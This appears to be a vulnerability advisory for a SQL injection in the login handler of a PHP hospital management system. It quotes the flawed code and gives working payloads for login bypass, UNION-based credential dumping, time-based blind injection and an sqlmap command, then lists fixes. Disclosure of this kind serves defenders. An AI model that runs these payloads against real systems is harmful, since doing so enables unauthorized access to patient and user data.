Share
## https://sploitus.com/exploit?id=ECD019AB-4224-5E31-BC99-E65B9C429640
# Online Hospital Management System has SQL Injection vulnerability in login_1.php

## Supplier

https://code-projects.org/online-hospital-management-system-in-php-with-source-code/

## Vulnerability file

text

```
login_1.php
```



## describe

In `login_1.php`, there is a critical SQL injection vulnerability in the Online Hospital Management System. The controllable parameter is `username` (sent via HTTP POST method). This parameter is directly concatenated into a SELECT SQL query without any sanitization or parameterized query protection. Because `login_1.php` is the login handler and does not require prior authentication, the vulnerability can be triggered by **any unauthenticated remote attacker**. A malicious attacker can bypass authentication entirely, log in as any user (including administrators), or extract sensitive data from the database using UNION or blind SQL injection techniques.

**Code analysis**

The vulnerable code resides on line 10 of `login_1.php`:

php

```
$username=$_POST['username'];
$password=$_POST['password'];
$user=$_POST['user'];

$sql="select * from login_user where username='$username'";
$query=mysqli_query($db,$sql);
```



The `$_POST['username']` value is taken directly from the login form and inserted into the SQL query string without any escaping or use of a prepared statement. The application then checks if a row is returned and subsequently validates the password and user role in PHP. However, an attacker can inject malicious SQL code into the `username` field to manipulate the query's logic or retrieve arbitrary data.

## POC

### 1. Authentication Bypass (Universal Login)

Submit the following as the `username` to bypass authentication and log in as the first user in the database (typically the admin):

![image-20260507164821088](images/1.png)

```
' OR '1'='1' LIMIT 1 -- -
```



With the password and user type set to any values (e.g., `password=123`, `user=admin`), the resulting SQL becomes:

sql

```
select * from login_user where username='' OR '1'='1' LIMIT 1 -- '
```



This query returns the first row from the `login_user` table. If the attacker sets the `user` parameter to `admin`, the PHP logic `if($fetch['user']==$user && $fetch['user']=='admin')` will succeed, granting immediate administrative access and redirecting to `../index_1.php`.

### 2. Authentication Bypass Targeting a Specific User

To log in as a specific user (e.g., `admin`) without knowing the password:

text

```
admin' -- -
```



The query becomes:

sql

```
select * from login_user where username='admin' -- '
```



This bypasses any password check because the password validation is done in PHP after the SQL query. The attacker simply needs to know or guess a valid username.

### 3. Union-Based Data Extraction

![image-20260507165435634](images/2.png)

The login page does not directly display data, but an attacker can use error-based or union-based techniques if error reporting is enabled (as it often is in this application via `mysqli_error` calls on other pages).

**Determine number of columns (typically 4 or more):**

text

```
' UNION SELECT 1,2,3,4 -- -
```



Gradually increase columns until no error occurs. Assuming the `login_user` table has at least 4 columns (e.g., `id`, `username`, `password`, `user`), the payload above will work.

**Extract database name and version:**

text

```
' UNION SELECT 1,database(),version(),4 -- -
```



**Dump usernames and passwords from `login_user`:**

text

```
' UNION SELECT 1,group_concat(username,':',password),3,4 FROM login_user -- -
```



This will cause an SQL error visible on the page (if errors are displayed), revealing all credentials.

### 4. Time-Based Blind SQL Injection

If all errors are suppressed, time-based injection can verify the vulnerability:

text

```
' AND SLEEP(5) -- -
```



A 5-second delay before the server responds confirms that SQL code is being executed.

### 5. Automated Exploitation with sqlmap

Save the POST request (including `username`, `password`, and `user` fields) to a file `login_request.txt` and run:

text

```
sqlmap -r login_request.txt -p username --level 3 --batch
```



sqlmap will automatically exploit the injection and can dump the entire database, including all user credentials.

![image-20260507165541902](images/3.png)

![image-20260507165613224](images/4.png)

## Impact

Successful exploitation allows an attacker to:

- **Bypass authentication completely** and log in as any user without a password
- **Gain administrative access** by logging in as an admin account
- **Extract all usernames and passwords** from the `login_user` table, leading to full credential compromise
- **Access sensitive data** from other database tables via UNION or blind injection
- **Potentially write files or execute commands** on the server, depending on MySQL user privileges and configuration (e.g., `INTO OUTFILE`)

## Remediation

1. **Use Prepared Statements** for all database queries involving user input:

php

```
$stmt = $db->prepare("SELECT * FROM login_user WHERE username = ?");
$stmt->bind_param("s", $_POST['username']);
$stmt->execute();
$result = $stmt->get_result();
$check = $result->num_rows;
if ($check > 0) {
    $fetch = $result->fetch_assoc();
    // proceed with password verification and role check
}
```



1. **Implement Input Validation** โ€“ restrict the `username` field to alphanumeric characters and expected lengths only. For example:

php

```
if (!preg_match('/^[a-zA-Z0-9_]{3,20}$/', $_POST['username'])) {
    die("Invalid username format");
}
```



1. **Store Passwords Securely** โ€“ use `password_hash()` and `password_verify()` instead of comparing plaintext passwords.
2. **Add Rate Limiting and Account Lockout** to prevent brute-force attacks and automated exploitation.
3. **Disable Detailed Error Messages** in production โ€“ display a generic "Invalid username or password" message regardless of the actual error. This prevents attackers from gaining feedback during injection attacks.
4. **Apply Least Privilege Principle** โ€“ the MySQL user used by the application should have only the necessary permissions (no FILE privilege, no access to `mysql` schema, etc.).